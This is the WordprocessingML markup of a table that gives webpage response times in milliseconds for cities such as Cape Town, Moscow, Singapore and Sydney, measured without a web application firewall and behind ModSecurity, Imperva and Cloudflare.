    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14660" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2943"/>
        <w:gridCol w:w="966"/>
        <w:gridCol w:w="1359"/>
        <w:gridCol w:w="965"/>
        <w:gridCol w:w="1144"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="1043"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="2CC9FA65" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="356E04C5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4240" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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8B9D859" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CADC5EA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="618E9E50"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375C4A17"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6A9324D4"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29F8B601"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456B07CC"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3617093B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="547A64B4" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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B97C5FD"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City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689357D2"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w/o WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="779CF61E"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ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B9ACD24"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Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CBCBBD0"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Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7DFD51" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F6BF5B4"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5BBDB5BC"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17F1C1BE"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30A264B3"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60FDF63A"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09DBE8B0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="5A14CE30" w14:textId="77777777" w:rsidTr="001C3F72">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76763324" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F94DF8B"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702.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D50ADE3"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738.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B2BC7DE"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813.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="799F406C"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827.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7778F3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B67FD16"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7F6503BD"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614D6630"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71563B71"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14334F7F"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0F7D6EEA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="19054F6A" w14:textId="77777777" w:rsidTr="001C3F72">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6B36F6B4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A34D7A"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488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E0255A"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581.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F05B3F9"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518.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18D66633"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519</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="741B670D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A4D4439"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613F2B20"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4F666475"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2628C3AF"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04E7C8A0"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4B085081" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0A4CFB81" w14:textId="77777777" w:rsidTr="001C3F72">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7BC45438" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35DFE9D2"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548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A19F255"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505.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007286F1"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599</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44AF79C8"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511.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ADFCA45" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="165F8B7E"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6A770CC1"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743139DA"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1F85560F"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59434CA6"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05E055EC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="78D7262D" w14:textId="77777777" w:rsidTr="001C3F72">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46594341" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6975E1B6"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423.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A60FFCC"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433.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2642188B"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620.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50B44165"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696.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3DA2AC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
